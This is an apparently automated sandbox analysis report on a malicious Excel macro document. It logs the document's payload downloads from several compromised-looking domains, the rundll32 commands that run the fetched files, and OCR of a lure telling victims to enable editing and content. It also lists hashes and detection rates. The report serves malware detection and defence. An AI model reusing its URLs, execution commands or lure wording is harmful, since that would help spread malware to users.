Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tienda.ventadigital.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thirdstringcalifornia.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: holmesservices.mobiledevsite.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nellaimasthanbiryani.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75F3850F.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tienda.ventadigital.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thirdstringcalifornia.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: holmesservices.mobiledevsite.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nellaimasthanbiryani.comConnection: Keep-Alive

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: kristen.sbddev.com

Source: global traffic

Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2100437884.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 :: Once You have Enable Editing, please ell r, i m
Source: Screenshot number: 8	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click Enab
Source: Screenshot number: 8	Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 18 WHY I CANNOTOPEN THIS DOCUMENT? 19 2
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 12	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU

Found Excel 4.0 Macro with suspicious formulas

Source: document-933340782.xlsm

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Source: document-933340782.xlsm

Initial sample: Sheet size: 53161

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal88.expl.evad.winXLSM@11/12@5/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$document-933340782.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCB2B.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer

Source: document-933340782.xlsm	Virustotal: Detection: 37%
Source: document-933340782.xlsm	Metadefender: Detection: 16%
Source: document-933340782.xlsm	ReversingLabs: Detection: 48%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image4.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

ID:	383151
Product:	CloudBasic
Start time:	10:46:01
Start date:	07.04.2021
Sample:	document-933340782.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	766f5bb363db9a966b613a42a118798a
SHA1:	57e67742fd7e7fa0badddca5b2cceb4cf09048a7
SHA256:	9952ce93009bb9fe2b687053da8db61f551cd524ca2691669257c35aaba18832
Filetype:	Excel Microsoft Office Open XML Format document (40004/1) 83.33%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\suspendedpage[1].htm	HTML document, ASCII text, with very long lines	AFC83AE7C4EA82B533D9B8731AAB3E80	A77EB9C6E5472FE4A17385ACB32BF96C9F69A65F	FDF900267092BC67BD7786B86C462E69F9ED52BED838809B6BA28B298BE879F6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D8BBC4.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	A516B6CB784827C6BDE58BC9D341C1BD	9D602E7248E06FF639E6437A0A16EA7A4F9E6C73	EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7387CA72.png	PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced	13CE435F07ADD2BEABD4A860755B489D	6CB356E6EA48633D56B49E578039818E493D364F	AA2172D7F8454BEF43575C8877FCA816254D49BE7A9AF420B0C7FEE0169058E4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75F3850F.png	PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced	D8574C9CC4123EF67C8B600850BE52EE	5547AC473B3523BA2410E04B75E37B1944EE0CCC	ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5F5A0F5.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	02DB1068B56D3FD907241C2F3240F849	58EC338C879DDBDF02265CBEFA9A2FB08C569D20	D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
C:\Users\user\AppData\Local\Temp\C1DE0000	data	75D5EBE3BB27E63BB7B1B3BFAD5466B0	17E6B14CCF5F5F650F3C1241DFFD4C1E53E5EE3A	E2B376D8A9093A89C3427258C2A52BF5B35030144F74295A4B130F17E9C9B464
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 16:46:39 2021, atime=Wed Apr 7 16:46:39 2021, length=12288, window=hide	64C9E07A23ED6F71462819388A106F9B	949D424E51372DC171CBF44657A5C356BE9F4802	C300CFCAA84EF8230D11DEAA7F7D385AD4C42DDAF986484706914384F8D35014
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-933340782.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Apr 7 16:46:39 2021, atime=Wed Apr 7 16:46:39 2021, length=108482, window=hide	80F9BD0D08F74462CBB9348AE22D2EF9	1207BA7A83F0D892BF874DA10098F18E21DF9EFE	4C38DB76F6983416C691A348FBA03714F8BE499ADFA1F8F2993507A5FCC48B50
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	3964574BC9DD3C18B48C07D1334EDABC	F3A4E8168156D52D261727B6D09867A7488C6E2B	A8B88213A4FC40A7ECC677D7EAA84C51DDD0BC729002ADDF34DE36230409D12B
C:\Users\user\Desktop\82DE0000	data	75D5EBE3BB27E63BB7B1B3BFAD5466B0	17E6B14CCF5F5F650F3C1241DFFD4C1E53E5EE3A	E2B376D8A9093A89C3427258C2A52BF5B35030144F74295A4B130F17E9C9B464
C:\Users\user\Desktop\~$document-933340782.xlsm	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\user\iekdhfe.dsk	HTML document, ASCII text, with very long lines	AFC83AE7C4EA82B533D9B8731AAB3E80	A77EB9C6E5472FE4A17385ACB32BF96C9F69A65F	FDF900267092BC67BD7786B86C462E69F9ED52BED838809B6BA28B298BE879F6

Analysis Report document-933340782.xlsm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs